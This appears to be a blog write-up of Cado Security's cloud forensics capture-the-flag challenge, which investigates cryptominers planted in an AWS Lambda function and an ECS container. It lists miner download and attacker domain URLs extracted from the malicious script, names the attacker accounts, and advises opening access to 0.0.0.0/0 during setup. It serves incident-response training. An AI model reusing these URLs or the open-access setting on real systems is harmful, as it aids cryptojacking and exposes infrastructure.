Cloud Forensic Write-up Investigating Serverless and Container Attacks Cado CTF on AWS

Jeffry Gunawan
MII Cyber Security Consulting Services
5 min readDec 27, 2022

Cites from the website, Captured by Cado is a Capture the Flag (CTF) challenge series designed to educate incident responders on how to investigate attacks on cloud-based systems. This challenge is specifically focused on investigating three attack scenarios in Lambda serverless functions and ECS container systems. (Cado, 2022).

Pre-Requisites

  • Basic Knowledge of Cloud Computing (and basic how to use AWS)
  • Basic Knowledge of Forensic Investigation
  • Basic Knowledge of Linux
  • Aws Free Tier Account

Overview Platform Installation

First you must register on this website : Webinar: Captured by Cado — Serverless & Container Attack Investigation (cadosecurity.com)

Platform Installation Overview

then it will show you the steps and the replied email like this picture below.

We have 2 CTF, first using Lambda services and the second is using ECS CTF.

Step by step Install the CTF Platform

  1. Open CloudFormation in AWS Console, then import the CloudFormation template. (You can follow the tutorial : https://vimeo.com/734144691)
Using template Cloud Formation

2. Then Fill the blank name and next

Fill the input box

3. In another tab, create your key pairs in EC2

Create a key pair

4. Allow access from any IP. Fill the box with 0.0.0.0/0 which mean accessible from anywhere.

Allow all ip address

5. Check the acknowledgement then submit.

Submit check button

6. Then wait the Stacks until the status finished

Stack deploying status

7. After completed, view the outputs > CadoURL.
That is the url to access the CTF platform. Copy the instanceID for the next step (first-time password change use the InstanceID).

8. Login with username admin and the password is InstanceId

Login Page Cado Platform

9. Accept

Agreement CADO

10. Change your password for the first time

Change Password

11. Open your Community License from your email like this. Then Save as json format.

Community License

12. Upload to your CADO platform then submit.

Uploading License Cado

13. CADO platform dashboard view.

Cado Dashboard

14. Download the ctf files. Link : https://github.com/cado-security/ctf-lambda-containers/releases/tag/v1.0

Cado Github

15. Download both of them

Download Cado CTF Assets

16. Upload the file to your S3 Bucket

Assets upload using S3

17. Create 2 Projects named Lambda CTF and ECS CTF.

Create Project CADO

18. Result of Creation Project

Empty Project Cado

19. Import the Artifact from from S3

How to import artifact using s3

20. Choose and import the object

Import the ctf assets

21. It will be running automatically.

Starting the Evidence

Lambda CTF Writeup

Looking in the AWS Console, you discover a Lambda function that nobody knows anything about.

You use Cado Response to acquire the Lambda function and its associated logs and immediately find that it’s a cryptominer running in Lambda.

Questions :

  • What are the three URLs embedded in the script?

the step to get the answer is just read the source code

Source code malicious function
decode from base64

https://github.com/xmrig/xmrig/releases/download/v6.12.2/xmrig-6.12.2-linux-x64.tar.gz

https://denonia.xyz

https://cloudflare-dns.com/dns-query?name=gw.denonia.xyz

  • When was the first time this function was run?

GMT: Tuesday, June 28, 2022 3:47:30 PM
Your time zone: Tuesday, June 28, 2022 10:47:30 PM GMT+07:00

ECS CTF

The AWS Console also shows some containers that request way more vCPU resources than your standard containers do.

You use Cado Response to acquire the container, and again, you find that someone installed a cryptominer.

Questions :

  • What users did the attacker create?
/etc/passwd evidence
bash history evidence

evil_account, drevil

  • What command did the attacker run from Pastebin.com?
echo Hello World
  • How did the attacker find out what the external IP address of the system was?
bash history evidence
curl command to get external address
  • BONUS: What might be some additional data you want to collect to understand more?

if there is audit.d installed it will be better and must be collect.

References :

GitHub — cado-security/ctf-lambda-containers

https://offers.cadosecurity.com/serverless-container-attack-investigation

--

--

MII Cyber Security Consulting Services
MII Cyber Security Consulting Services

Published in MII Cyber Security Consulting Services

MII Cyber Security Consulting Services is a division under PT. Mitra Integrasi Informatika and part of Metrodata Group. MII Cyber Security Consulting Services provide following services : Security Assessment, DFIR Services, MSS SOC, Training, and other cyber security fields.

Jeffry Gunawan
Jeffry Gunawan

Written by Jeffry Gunawan

Cyber Security Consultant | CEH(P), CHFI, ECIH, CSA, CSCU, SC200,400,300,900

No responses yet